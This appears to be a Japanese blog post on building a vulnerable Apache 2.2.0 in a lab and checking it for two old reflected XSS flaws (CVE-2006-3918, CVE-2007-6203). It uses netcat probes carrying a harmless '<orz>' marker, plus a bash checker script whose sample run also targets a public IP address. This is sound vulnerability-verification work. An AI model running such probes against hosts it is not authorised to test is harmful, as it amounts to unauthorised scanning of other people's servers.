Apache のクロスサイトスクリプティングを検証

  Linux

新しい脆弱性の話ではないです。やられ Apache の作り方と検証例です。

やられ Apache のインストール手順

yum -y install gcc openssl-devel
wget http://archive.apache.org/dist/httpd/httpd-2.2.0.tar.gz
tar zxf httpd-2.2.0.tar.gz
cd httpd-2.2.0/
./configure --prefix=/usr/local/httpd-2.2.0 --enable-mods-shared=all --enable-ssl
make
sudo make install
sudo /usr/local/httpd-2.2.0/bin/apachectl start
sudo /sbin/iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport 80 192.168.0.0/24 -j ACCEPT

Apache Expect ヘッダのクロスサイトスクリプティング脆弱性

$ echo -en "GET / HTTP/1.0\nExpect: <orz>\n\n" | nc 192.168.0.128 80
HTTP/1.1 417 Expectation Failed
Date: Wed, 27 Jan 2010 12:46:40 GMT
Server: Apache/2.2.0 (Unix) mod_ssl/2.2.0 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Content-Length: 360
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
field could not be met by this server.</p>
<p>The client sent<pre>
 Expect: <orz>
</pre>
but we only allow the 100-continue expectation.</p>
</body></html>

Apache HTTP メソッドのクロスサイトスクリプティング

$ echo -en "<orz> / HTTP/1.1\nHost: 192.168.0.128\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc 192.168.0.128 80
HTTP/1.1 413 Request Entity Too Large
Date: Wed, 27 Jan 2010 12:47:34 GMT
Server: Apache/2.2.0 (Unix) mod_ssl/2.2.0 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/index.html<br />
does not allow request data with <orz> requests, or the amount of data provided in
the request exceeds the capacity limit.
</body></html>

検証用スクリプト

#!/bin/bash
LANG=C

IPADDR=${1}
PORT=${2}

echo "# Check Apache Cross Site Scripting" >&2
echo "#   (1) CVE-2006-3918: Apache Expect Header XSS" >&2
echo "#   (2) CVE-2007-6203: Apache HTTP Method XSS" >&2
echo "# IpAddr:Port,CVE-2006-3918,CVE-2007-6203" >&2
echo -n "${IPADDR}:${PORT},"
echo -en "GET / HTTP/1.0\nExpect: <orz>\n\n" | nc ${IPADDR} ${PORT} | grep -q "<orz>" && echo -n "VULNERABLE" || echo -n "not_vulnerable"
echo -n ","
echo -en "<orz> / HTTP/1.1\nHost: ${IPADDR}\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc ${IPADDR} ${PORT} | grep -q "<orz>" && echo -n "VULNERABLE" || echo -n "not_vulnerable"
echo ""

exit 0

検証用スクリプト実行例

$ ./apache_xss.sh 192.168.0.128 80
# Check Apache Cross Site Scripting
#   (1) CVE-2006-3918: Apache Expect Header XSS
#   (2) CVE-2007-6203: Apache HTTP Method XSS
# IpAddr:Port,CVE-2006-3918,CVE-2007-6203
192.168.0.128:80,VULNERABLE,VULNERABLE

$ ./apache_xss.sh 116.58.170.251 80
# Check Apache Cross Site Scripting
#   (1) CVE-2006-3918: Apache Expect Header XSS
#   (2) CVE-2007-6203: Apache HTTP Method XSS
# IpAddr:Port,CVE-2006-3918,CVE-2007-6203
116.58.170.251:80,not_vulnerable,not_vulnerable